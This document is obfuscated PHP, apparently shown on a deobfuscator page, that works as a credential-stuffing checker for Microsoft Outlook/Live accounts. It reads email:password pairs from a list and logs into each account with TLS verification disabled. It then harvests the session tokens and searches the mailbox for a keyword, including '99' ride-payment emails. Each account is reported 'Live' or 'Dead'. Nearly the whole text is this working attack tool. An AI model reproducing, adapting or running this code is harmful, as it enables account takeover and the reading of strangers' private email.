curl_setopt($curl, CURLOPT_POST, true); goto fs44E; bYtwA: $email = trim(multiexplode($lista)[0]); goto o62Mj; yoGz5: curl_setopt($curl, CURLOPT_URL, $url); goto z4bbP; GzFjD: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto sYdwj; TVS4x: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto oJ3mh; I46rY: $curl = curl_init($url); goto YQ9Pd; mp1p9: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto OArEs; ohrtF: $url = trazer($Login, "urlPost:'", "'"); goto I46rY; o62Mj: $senha = trim(multiexplode($lista)[1]); goto gfabt; LMu8v: $curl = curl_init($url); goto cE9Q7; joD4m: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto c9nb2; wl0mx: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto G70vs; AVWL_: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto tdUoT; vafsY: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto AifEm; tdUoT: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto joD4m; TJbyx: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto Sh_8C; sYdwj: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto H6gE8; nBUWq: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto TVS4x; HbTSX: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto nROrv; C0yew: $url = trim(trazer($get_2, "location: ", "server:")); goto LMu8v; EdIdG: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto wWtk3; BtuTT: if (strpos($Login2, "pprid")) { $auth = trazer($Login2, "RpsCsrfState=", "&"); $pprid = trazer($Login2, "name="pprid" id="pprid" value="", """); $NAP = trazer($Login2, "name="NAP" id="NAP" value="", """); $ANON = trazer($Login2, "name="ANON" id="ANON" value="", """); $t = urlencode(trazer($Login2, "name="t" id="t" value="", """)); $url = "https://outlook.live.com/owa/?exch=1&nlp=1&RpsCsrfState={$auth}&wa=wsignin1.0"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "cache-control: max-age=0", "origin: https://login.live.com", "dnt: 1", "upgrade-insecure-requests: 1", "content-type: application/x-www-form-urlencoded", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "sec-fetch-site: same-site", "sec-fetch-mode: navigate", "sec-fetch-dest: document", "referer: https://login.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "wbids=0&pprid={$pprid}&wbid=MSFT&NAP={$NAP}&ANON={$ANON}&t={$t}"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $url = "https://outlook.live.com/owa/0/?exch=1&nlp=1&RpsCsrfState={$auth}"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "cache-control: max-age=0", "dnt: 1", "upgrade-insecure-requests: 1", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "sec-fetch-site: same-site", "sec-fetch-mode: navigate", "sec-fetch-dest: document", "referer: https://login.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetBposShellInfoNavBarData&app=Mail&n=1"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%7D", "content-type: application/json; charset=utf-8", "action: GetBposShellInfoNavBarData", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary2 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAttachmentPreviews&app=Mail&n=9"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary2}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json; charset=utf-8", "action: GetAttachmentPreviews", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary3 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAttachmentPreviews&app=Mail&n=16"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary3}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json; charset=utf-8", "action: GetAttachmentPreviews", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary4 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetBposShellInfoNavBarData&app=Mail&n=18"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary4}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%7D", "content-type: application/json; charset=utf-8", "action: GetBposShellInfoNavBarData", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary5 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAccessTokenforResource&UA=0&app=Mail&n=21"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary5}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%22__type%22%3A%22TokenRequest%3A%23Exchange%22%2C%22Resource%22%3A%22https%3A%2F%2Foutlook.live.com%22%7D", "content-type: application/json; charset=utf-8", "action: GetAccessTokenforResource", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $key = trazer($resp, ""AccessToken":"", """); $url = "https://outlook.live.com/search/api/v2/query?n=162&cv=P79J1Me7qJtd%2FXk37TRvUI.175"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $headers = array("Host: outlook.live.com", "x-search-griffin-version: GWSv2", "dnt: 1", "scenariotag: 1stPg_mg", "x-ms-appname: owa-reactmail", "accept-language: pt-BR", "authorization: Bearer {$key}", "x-anchormailbox: SMTP:{$email}", "x-client-flights: OWA_BestMatch_V15,CalendarInsightsFlight,EnablePeoplePillGhostingOWA,CalendarAnswerFlight,CalendarAnswerWithQas,CalendarAnswerConflicts,CalendarInsightsFlight,ConflictsInCalendarInsights,bfbfileansoff,FetchFileArtifacts", "x-req-source: Mail", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json", "x-routingparameter-sessionkey: SMTP:{$email}", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "{"Cvid":"a4e28ad5-ca54-aa32-58ce-e2e278b40886","Scenario":{"Name":"owa.react"},"TimeZone":"UTC-02","TextDecorations":"Off","EntityRequests":[{"EntityType":"Message","ContentSources":["Exchange"],"Filter":{"Or":[{"Term":{"DistinguishedFolderName":"msgfolderroot"}},{"Term":{"DistinguishedFolderName":"DeletedItems"}}]},"From":0,"Query":{"QueryString":"" . $palavrachave . ""},"RefiningQueries":null,"Size":25,"Sort":[{"Field":"Score","SortDirection":"Desc","Count":3},{"Field":"Time","SortDirection":"Desc"}],"EnableTopResults":true,"TopResultsCount":3}],"AnswerEntityRequests":[{"Query":{"QueryString":"" . $palavrachave . ""},"EntityTypes":["Event","File"],"From":0,"Size":10,"EnableAsyncResolution":true}],"QueryAlterationOptions":{"EnableSuggestion":true,"EnableAlteration":true,"SupportedRecourseDisplayTypes":["Suggestion","NoResultModification","NoResultFolderRefinerModification","NoRequeryModification","Modification"]},"LogicalId":"3a50ac5c-ecb1-dabb-263a-2ba10309368a"}"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $verificar = curl_exec($curl); if (strpos($verificar, $palavrachave)) { $palavra = "<span class='text-success'>Sim</span>"; if ($palavrachave == "Equipe 99") { if (strpos($verificar, "Cart\xc3\xa3o de Cr\xc3\251dito")) { $cartao = "<span class='text-success'>Sim</span>"; } else { $cartao = "<span class='text-danger'>N\303\xa3o</span>"; } if (strpos($verificar, "Dinheiro")) { $Dinheiro = "<span class='text-success'>Sim</span>"; } else { $Dinheiro = "<span class='text-danger'>N\303\xa3o</span>"; } $msg = trazer($verificar, "Total", "escolher"); $dados = "<span class='text-warning'>[Corridas no Dinheiro:</span> {$Dinheiro}<span class='text-warning'>|Corridas no Cart\303\xa3o:</span> {$cartao}<span class='text-warning'><span class='text-info'>|Ultima Corrida: {$msg} escolher</span><span class='text-warning'>] \xe2\236\234 </span>"; } } else { $palavra = "<span class='text-danger'>N\xc3\243o</span>"; } echo "<br><span class='text-success'>[#Live] \xe2\x9e\x9c </span>
        <span class='text-info'>{$lista} \342\x9e\x9c </span>{$dados}\xa        <span class='text-warning'>[Contem email relacionado a {$palavrachave}: {$palavra}] \342\236\234</span>
        <span class='text-info'>Center-509</span><br>"; curl_close($curl); die; } else { echo "<br><span class='text-warning'>[#Dead] \xe2\236\234 </span>
        <span class='text-info'>{$lista} \342\236\x9c </span>\xa        <span class='text-danger'>[Your account or password is incorrect] \342\x9e\234 </span>\xa        <span class='text-info'>Center-509</span><br>"; curl_close($curl); die; } ?>
?>

Function Calls

None

Variables

None

Stats

MD5 1a646061c0a5d6fabb954f55a5635197
Eval Count 0
Decode Time 81 ms